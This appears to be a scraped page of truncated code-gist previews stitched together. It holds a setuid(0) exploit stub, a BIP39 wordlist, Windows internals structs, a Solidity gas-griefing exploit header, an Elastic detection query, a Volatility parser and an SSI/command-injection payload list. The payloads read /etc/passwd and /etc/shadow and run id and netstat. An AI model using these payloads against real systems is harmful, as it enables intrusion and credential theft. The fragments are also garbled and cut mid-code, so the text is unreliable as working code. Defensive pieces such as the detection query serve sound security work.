user@hostname:~/exploit$ cat > test.c#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int main() {
if (setuid(0) != 0) {| const WORDLIST = ["abandon","ability","able","about","above","absent","absorb","abstract","absurd","abuse", | |
| "access","accident","account","accuse","achieve","acid","acoustic","acquire","across","act", | |
| "action","actor","actress","actual","adapt","add","addict","address","adjust","admit", | |
| "adult","advance","advice","aerobic","affair","afford","afraid","again","age","agent", | |
| "agree","ahead","aim","air","airport","aisle","alarm","album","alcohol","alert", | |
| "alien","all","alley","allow","almost","alone","alpha","already","also","alter", | |
| "always","amateur","amazing","among","amount","amused","analyst","anchor","ancient","anger", | |
| "angle","angry","animal","ankle","announce","annual","another","answer","antenna","antique", | |
| "anxiety","any","apart","apology","appear","apple","approve","april","arch","arctic", | |
| "area","arena","argue","arm","armed","armor","army","around","arrange","arrest", |
| #include <stdio.h> | |
| #include <assert.h> | |
| #include <Windows.h> | |
| // Some of them were taken (and modified) from https://github.com/winsiderss/systeminformer | |
| typedef struct _SYSTEM_ISOLATED_USER_MODE_INFORMATION | |
| { | |
| BOOLEAN SecureKernelRunning : 1; | |
| BOOLEAN HvciEnabled : 1; |
| // Demonstrates use of NtQuerySystemInformation and SystemProcessIdInformation to get the image name of a process without opening a process handle | |
| // Author: TheWover | |
| // | |
| #include <iostream> | |
| #include <string> | |
| #include "ntdefs.h" | |
| typedef struct SYSTEM_PROCESS_ID_INFORMATION | |
| { |
| // SPDX-License-Identifier: GPL-3.0 | |
| pragma solidity 0.8.17; | |
| interface ICallback { | |
| function beforeExecution() external; | |
| } | |
| /** Exploit Desc: **/ | |
| // The GasGriefer is used as a `callbackContract` on a swapOrder |
| // DLLs normally located in system32 but unsigned and loaded from elsewhere | |
| // https://www.elastic.co/guide/en/elasticsearch/reference/master/esql-enrich-data.html | |
| // example ENRICH libs-policy creation steps | |
| https://gist.github.com/Samirbous/9f9c3237a0ada745e71cc2ba3425311c | |
| ES|QL query: | |
| from .ds-logs-endpoint.events.library-* | |
| | where event.action == "load" and process.code_signature.status == "trusted" and dll.code_signature.status != "trusted" and |
user@hostname:~/exploit$ cat > test.c#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int main() {
if (setuid(0) != 0) {| from __future__ import annotations | |
| import re | |
| from itertools import cycle | |
| MAX_SETTINGS = 128 | |
| def load_mapping(filename: str) -> dict[int, int]: | |
| """Processes textual Volatility memmap output into a page mapping.""" |
| <!--#exec%20cmd="/bin/cat%20/etc/passwd"--> | |
| <!--#exec%20cmd="/bin/cat%20/etc/shadow"--> | |
| <!--#exec%20cmd="/usr/bin/id;--> | |
| <!--#exec%20cmd="/usr/bin/id;--> | |
| /index.html|id| | |
| ;id; | |
| ;id | |
| ;netstat -a; | |
| ;system('cat%20/etc/passwd') | |
| ;id; |
| using System; | |
| using System.Collections; | |
| using System.Collections.Generic; | |
| using System.Linq; | |
| using System.Linq.Expressions; | |
| using System.Reflection; | |
| using System.Text; | |
| GetMethodHash("System.Reflection.Assembly", "Load"); |
| 0 | |
| 00 | |
| 01 | |
| 02 | |
| 03 | |
| 1 | |
| 1.0 | |
| 10 | |
| 100 | |
| 1000 |